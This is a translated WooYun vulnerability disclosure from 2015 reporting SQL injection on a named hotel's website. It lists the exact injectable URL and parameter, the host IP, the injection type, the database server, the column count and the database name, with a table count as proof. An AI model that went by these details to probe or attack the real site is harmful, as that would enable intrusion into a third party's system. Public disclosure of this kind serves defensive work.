
Vulnerability summary

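Bug ID: wooyun-2015-0126764

Vulnerability title: SQL injection at Jiuzhaigou Xingyu International Hotel

Affected vendor: Xingyu International Hotel

Reported by: 蝶.!

Submitted: 2015-07-14 17:23

Fix time: 2015-08-28 17:24

Public disclosure: 2015-08-28 17:24

Vulnerability type: SQL injection

Severity: Low

Self-assessed rank: 3

Vulnerability status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]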



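Vulnerability details

Disclosure status:

2015-07-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-08-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection at Jiuzhaigou Xingyu International Hotel

Detailed description: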

Injection point: http://www.xingyuhotel.com/english/news.php?id=28&typeid=2
Host IP: 121.42.111.170
Web Server: Apache
Keyword Found: Release
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 2
Current DB: qdm16058959_db

Proof of vulnerability:

Tables of qdm16058959_db:
table_name table_rows
------------------------------------------------------------
table count:376

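Remediation:

Copyright notice: when reposting, please credit the source 蝶.!@WooYun


Vulnerability response

Vendor response:

Unable to reach the vendor, or the vendor actively refused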